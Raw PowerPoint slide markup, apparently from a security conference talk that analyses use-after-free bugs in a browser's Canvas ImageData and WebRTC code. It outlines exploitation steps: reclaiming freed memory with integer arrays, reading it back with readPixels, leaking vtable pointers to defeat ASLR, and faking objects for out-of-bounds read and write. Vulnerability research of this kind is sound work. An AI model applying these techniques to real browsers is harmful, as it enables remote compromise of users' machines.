                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ta.buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> and GC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>// use integer array object to occupy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ta.buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>// The texImage2D method can write the contents of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> object to the Texture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>// The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>readPixels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> method can read the contents of the Texture through the Framebuffer.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25649908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lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Canvas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Exploitation </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Attack Demo</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ta1 = new Uint8Array(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>buffersize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.readPixels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(0, 0, dimension, dimension, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.RGBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gl.UNSIGNED_BYTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, ta1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>readPixels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> will read occupied the integer array into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TypeArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> of ta1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>As long as traverse the entire ta1, we can find the virtual table pointer of the integer array</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B86D1C8-6CF3-4767-B29C-6D2D36CB4A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3911600"/>
            <a:ext cx="9512661" cy="6323262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2322167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30039"/>
            <a:ext cx="10313668" cy="1126001"/>
            <a:chOff x="383732" y="551878"/>
            <a:chExt cx="12098995" cy="1529523"/>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551878"/>
              <a:ext cx="1629722" cy="1529523"/>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551878"/>
              <a:ext cx="10629695" cy="1529523"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> Background Knowledge</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6A2AFE6-C796-4568-AD10-508E132FDE21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B4D5DA-BE68-4CD7-A2D7-6B3F834F9CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114149" y="2861017"/>
            <a:ext cx="6792687" cy="2194138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304BCA59-D356-4864-A3A1-BA521ADC1C3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101804" y="5041235"/>
            <a:ext cx="6805032" cy="1355474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54306819-F26B-48EE-88F5-B2385B01C79A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114149" y="6396708"/>
            <a:ext cx="6816416" cy="1128485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43319B0A-7909-4242-9173-B9D3058AEA3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114148" y="7525193"/>
            <a:ext cx="6792687" cy="939700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736A769D-21E0-4188-8B73-4815E43F8F59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114150" y="8381765"/>
            <a:ext cx="6816416" cy="982874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{700CA5C3-40CE-42DB-B2C1-E272669340D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3123543" y="9266821"/>
            <a:ext cx="6807023" cy="1128485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27735410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04</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13951"/>
            <a:ext cx="11191212" cy="7684169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using the WebGL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> UAF vulnerability described above, we have the ability to leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pointers of integer arrays. The virtual table pointer address minus the relative offset is the base address of the chakra.dll module. By selecting the appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and type to fake the object, we can use the object type confusion to achieve memory out-of-bounds read and write.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="SimHei" charset="-122"/>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB958912-505D-4C81-A68F-230B55DAA776}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3914149"/>
            <a:ext cx="8386672" cy="606696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B920DE-A177-4CE0-AA40-8F6FF240E8AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="4520846"/>
            <a:ext cx="8065875" cy="6072800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39035180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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>In the WebRTC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parameters UAF vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>analysis, the program crashes at function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> function will have some checks on the object.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4EEFE62-8E3E-487E-83AA-F9854179F03D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3381955"/>
            <a:ext cx="6465675" cy="6854503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F49CBC8-709A-4FAF-8E4C-C1B5E15605DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="3381954"/>
            <a:ext cx="4525103" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point to the 4-byte value less than or equal to 0x4e then jump</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF66E49F-536C-4307-821A-36D72E8C44E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2486825" y="3911598"/>
            <a:ext cx="3126576" cy="49066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4" name="连接符: 肘形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3C07498-9383-4ECF-A89C-C4934D8B2191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5613401" y="3735897"/>
            <a:ext cx="1930399" cy="421034"/>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7" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6AFB631-7571-4005-85D7-3FD43CD57BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1078125" y="8052598"/>
            <a:ext cx="4027275" cy="57492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6" name="连接符: 肘形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
